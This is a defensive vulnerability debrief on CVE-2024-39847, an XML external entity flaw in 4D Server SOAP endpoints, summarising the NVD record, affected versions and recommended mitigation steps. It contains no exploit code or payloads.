PatchSiren cyber security CVE debrief

CVE-2024-39847 4d CVE debrief

CVE-2024-39847 is a high-severity vulnerability in 4D Server SOAP endpoint XML parsing. According to the NVD description, an unauthenticated attacker can abuse the weakness to read files on the application server and adjacent network shares, and can trigger HTTP GET requests to arbitrary services. The CVE was published on 2026-04-30 and later modified on 2026-05-17, so defenders should use the published CVE date for tracking and the modified date as a cue that the record changed after initial publication. The supplied NVD data marks the issue as CVSS 8.7 (HIGH) and maps affected CPEs to 4D Server 20 r3, 20 r4, and 20 r6.

Vendor: 4d
Product: Server
CVSS: HIGH 8.7
CISA KEV: Not listed in stored evidence
Original CVE published: 2026-04-30
Original CVE updated: 2026-05-17
Advisory published: 2026-04-30
Advisory updated: 2026-05-17

Who should care

Security and infrastructure teams responsible for 4D Server deployments, especially if SOAP endpoints are exposed to untrusted networks. Also relevant to teams that rely on adjacent file shares or backend services reachable from the application server.

Technical summary

The issue is associated with CWE-611 (XML External Entity / improper restriction of XML input). The NVD description says the weakness sits in XML parser functionality used by SOAP endpoints in 4D Server. Impact is server-side read access to local files and adjacent network shares, plus the ability to make HTTP GET requests to arbitrary services, which indicates both data exposure risk and server-side request abuse potential. NVD lists vulnerable CPE criteria for 4D Server 20 r3, 20 r4, and 20 r6.

Defensive priority

High. The combination of network reachability, unauthenticated attack surface, and potential access to files and internal services makes this a priority finding for exposed 4D Server instances.

Recommended defensive actions

Inventory 4D Server deployments and confirm whether versions 20 r3, 20 r4, or 20 r6 are in use.
Review whether SOAP endpoints are reachable from untrusted networks and restrict exposure where possible.
Apply vendor-provided remediation guidance from 4d.com and the linked third-party advisory.
Treat the issue as a potential file disclosure and server-side request abuse risk: review sensitive file locations and internal services reachable from the application server.
Monitor logs for abnormal SOAP requests or unexpected outbound HTTP GET activity originating from the server.
Validate that compensating controls such as network segmentation and least-privilege service access are in place while remediation is underway.

Evidence notes

All substantive claims in this debrief are drawn from the supplied NVD record and its listed references. The NVD entry states the vulnerability affects SOAP endpoint XML parser functionality in 4D Server and allows unauthenticated file read access and arbitrary HTTP GET requests. The record includes CVSS 8.7 HIGH, CWE-611, and vulnerable CPE criteria for 4D Server 20 r3, 20 r4, and 20 r6. The CVE was published on 2026-04-30 and modified on 2026-05-17. No KEV entry or ransomware-campaign attribution was supplied.

Official resources

CVE-2024-39847 CVE record
CVE.org
CVE-2024-39847 NVD detail
NVD
Source item URL
nvd_modified
Source reference
23637b5d-af4c-4cf9-b8f6-deb7fd0f8423 - Product
Mitigation or vendor reference
23637b5d-af4c-4cf9-b8f6-deb7fd0f8423 - Exploit, Third Party Advisory
Source reference
af854a3a-2127-422b-91ae-364da2661108

Publicly disclosed in the supplied CVE/NVD record on 2026-04-30; NVD modified the entry on 2026-05-17.